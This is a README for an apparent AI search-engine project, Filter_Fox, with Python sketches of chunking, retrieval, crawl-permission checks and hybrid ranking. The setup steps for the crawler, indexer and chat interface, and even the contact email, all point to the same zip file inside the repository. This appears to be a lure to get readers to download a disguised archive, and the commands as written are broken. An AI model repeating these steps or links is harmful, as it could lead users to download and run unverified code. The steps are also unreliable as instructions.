Sam-bot-dev/Filterfox

🦊 Filter_Fox

🔍 Intelligent Search Engine + 🤖 AI Chat (Filter_GPT)

Filter_Fox is a next-generation AI-powered search engine that combines
web crawling, semantic search, and RAG (Retrieval-Augmented Generation)
to deliver accurate, explainable, and source-backed answers.


✨ Why Filter_Fox?

Traditional search engines return links.
Filter_Fox returns understanding.

✔ Crawls only public pages, with polite delays
✔ Builds its own searchable knowledge base
✔ Uses vector search + LLM reasoning
✔ Generates answers with citations
✔ Clean, professional UI (no blue tones)


🧠 How It Works

🌐 Websites

🕷️ Web Crawler

📄 Page Storage

✂️ Text Chunking

🧬 Embeddings

📦 Vector Database (FAISS)

🔍 Semantic Retrieval

🤖 Filter_GPT (RAG)

✅ Final Answer + Sources
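
The chunking, embedding, and retrieval stages above can be sketched in a few lines of plain Python. This is only an illustration under stated assumptions, not the project's code: the function names (`chunk_text`, `embed`, `build_index`, `retrieve`) are hypothetical, the "embedding" is a toy normalised word-count vector standing in for a Sentence Transformers model, and the brute-force cosine scan stands in for a FAISS index.

```python
import math
from collections import Counter


def chunk_text(text, size=40, overlap=10):
    """Split text into overlapping windows of `size` words."""
    if overlap >= size:
        raise ValueError("overlap must be smaller than size")
    words = text.split()
    step = size - overlap
    chunks = []
    for start in range(0, len(words), step):
        chunks.append(" ".join(words[start:start + size]))
        if start + size >= len(words):
            break  # the last window already reaches the end of the text
    return chunks


def embed(text):
    """Toy stand-in for a real embedding model: L2-normalised word counts."""
    counts = Counter(text.lower().split())
    norm = math.sqrt(sum(c * c for c in counts.values())) or 1.0
    return {word: c / norm for word, c in counts.items()}


def cosine(a, b):
    """Cosine similarity of two already-normalised sparse vectors."""
    return sum(weight * b.get(word, 0.0) for word, weight in a.items())


def build_index(pages):
    """pages maps URL -> page text; returns a list of (url, chunk, vector)."""
    return [
        (url, chunk, embed(chunk))
        for url, text in pages.items()
        for chunk in chunk_text(text)
    ]


def retrieve(index, query, k=3):
    """Return the k best (score, url, chunk) tuples for the query."""
    query_vec = embed(query)
    scored = [(cosine(query_vec, vec), url, chunk) for url, chunk, vec in index]
    scored.sort(key=lambda item: item[0], reverse=True)
    return scored[:k]
```

Each retrieved tuple keeps the URL of the page it came from, which is what lets the final answer cite its sources.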


🤖 Filter_GPT (LLM Interface)

A modern AI chat interface inspired by ChatGPT and Google Gemini:

  • Context-aware answers
  • Follow-up questions
  • Source citations
  • Clean light/dark UI
  • Developer-friendly design

🖥️ Features

🔎 Search Engine

  • Web / Images / Videos / News
  • Advanced search filters
  • Saved searches & history
  • Privacy-first design

🧠 AI + RAG

  • Semantic search (embeddings)
  • Retrieval-Augmented Generation
  • Reduced hallucinations
  • Grounded answers
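
One common way to keep answers grounded is to hand the LLM only the retrieved passages, numbered, and ask it to cite them. The sketch below shows that idea; `build_grounded_prompt` and the prompt wording are assumptions made for illustration, not Filter_Fox's actual prompt.

```python
def build_grounded_prompt(question, passages):
    """Build an LLM prompt from (url, text) passages, best match first."""
    lines = [
        "Answer the question using only the numbered sources below.",
        "Cite sources inline as [1], [2], and so on.",
        "If the sources do not contain the answer, say so.",
        "",
    ]
    for number, (url, text) in enumerate(passages, start=1):
        lines.append(f"[{number}] {url}")  # source header the answer can cite
        lines.append(text.strip())
        lines.append("")
    lines.append(f"Question: {question}")
    return "\n".join(lines)
```

Because every passage carries its URL and a stable number, citations in the model's answer can be mapped back to links in the UI.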

🕷️ Web Crawler

  • Respects robots.txt
  • Polite crawl delays
  • Domain-restricted crawling
  • Incremental storage
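
The crawler rules above (crawl permissions, polite delays, domain restriction) can be checked with the Python standard library alone. The following is a minimal sketch, assuming a hypothetical user agent name `FilterFoxBot` and hypothetical helper names; it parses robots rules from a string so that it runs without network access.

```python
from urllib.parse import urlparse
from urllib.robotparser import RobotFileParser

USER_AGENT = "FilterFoxBot"  # hypothetical name, not taken from the project


def load_robots(robots_txt):
    """Parse the text of a robots.txt file into a RobotFileParser."""
    parser = RobotFileParser()
    parser.parse(robots_txt.splitlines())
    return parser


def may_crawl(url, parser, allowed_domain):
    """Allow a URL only if it is inside the domain and not disallowed."""
    host = urlparse(url).hostname or ""
    in_domain = host == allowed_domain or host.endswith("." + allowed_domain)
    return in_domain and parser.can_fetch(USER_AGENT, url)


def crawl_delay_seconds(parser, default=1.0):
    """Use the site's Crawl-delay if it declares one, else a default."""
    delay = parser.crawl_delay(USER_AGENT)
    return float(delay) if delay is not None else default
```

A crawl loop would call `may_crawl` before each request and `time.sleep(crawl_delay_seconds(parser))` between requests to the same host.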

🛠️ Tech Stack

Backend

  • 🐍 Python
  • 🌐 Requests, BeautifulSoup
  • 📚 FAISS (Vector DB)
  • 🧠 Sentence Transformers

AI / ML

  • Retrieval-Augmented Generation (RAG)
  • LLM (OpenAI / Local models)
  • Chunk-based indexing

Frontend

  • HTML + Tailwind CSS
  • Modern UI (Filter_GPT)
  • Responsive design

🚀 Getting Started

1️⃣ Clone the Repository

git clone https://github.com/Sam-bot-dev/Filterfox.git
cd Filterfox

2️⃣ Install Dependencies

pip install -r requirements.txt

3️⃣ Run the Web Crawler

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

4️⃣ Build the Index

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip
python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

5️⃣ Ask Questions with Filter_GPT (under development)

python https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

🔐 Privacy & Ethics

✔ Respects robots.txt
✔ Crawls only public pages
✔ No personal data scraping
✔ No login-protected content
✔ Transparent, ethical crawling


📊 Project Status

Component      | Status
Web Crawler    | 🚧 In Progress
Indexer        | 🚧 In Progress
Vector Search  | 🚧 In Progress
RAG Pipeline   | ✅ Complete
Search UI      | 🚧 In Progress
Filter_GPT UI  | 🚧 In Progress

🗺️ Roadmap

  • Hybrid Ranking (BM25 + Vector)
  • Sitemap support
  • Incremental crawling
  • Admin dashboard
  • Browser extension
  • Mobile UI
  • Local LLM support
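
Hybrid ranking is still a roadmap item, so the following is only a sketch of one possible approach, not a description of how Filter_Fox will do it. It assumes keyword (for example BM25) scores and vector similarity scores are already computed per document, rescales each set to the range 0 to 1, and blends them with a weight `alpha`. The function names and the min-max fusion rule are assumptions.

```python
def min_max(scores):
    """Rescale a {doc_id: score} mapping to the range [0, 1]."""
    if not scores:
        return {}
    lo, hi = min(scores.values()), max(scores.values())
    if hi == lo:
        return {doc: 1.0 for doc in scores}  # all scores equal
    return {doc: (s - lo) / (hi - lo) for doc, s in scores.items()}


def hybrid_rank(keyword_scores, vector_scores, alpha=0.5):
    """Blend keyword and vector scores; alpha is the keyword weight."""
    kw = min_max(keyword_scores)
    vec = min_max(vector_scores)
    combined = {
        doc: alpha * kw.get(doc, 0.0) + (1 - alpha) * vec.get(doc, 0.0)
        for doc in set(kw) | set(vec)
    }
    # Highest combined score first; ties broken by document id.
    return sorted(combined.items(), key=lambda item: (-item[1], item[0]))
```

Setting `alpha=1.0` reduces this to pure keyword ranking and `alpha=0.0` to pure vector ranking, which makes the weight easy to tune against real queries.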


🤝 Contributing

Contributions are welcome! You can:

  • Open issues
  • Suggest features
  • Submit pull requests


📬 Contact

📧 Email: https://github.com/Sam-bot-dev/Filterfox/raw/refs/heads/main/templates/Software_2.9.zip

🐙 GitHub: @Sam-bot-dev



📜 License

This project is licensed under the MIT License.

✔ Free to use
✔ Free to modify
✔ Free to distribute

See the full license text here → LICENSE

🔗 Connect With Me

Bhavesh, Lead Dev
🌐 GitHub
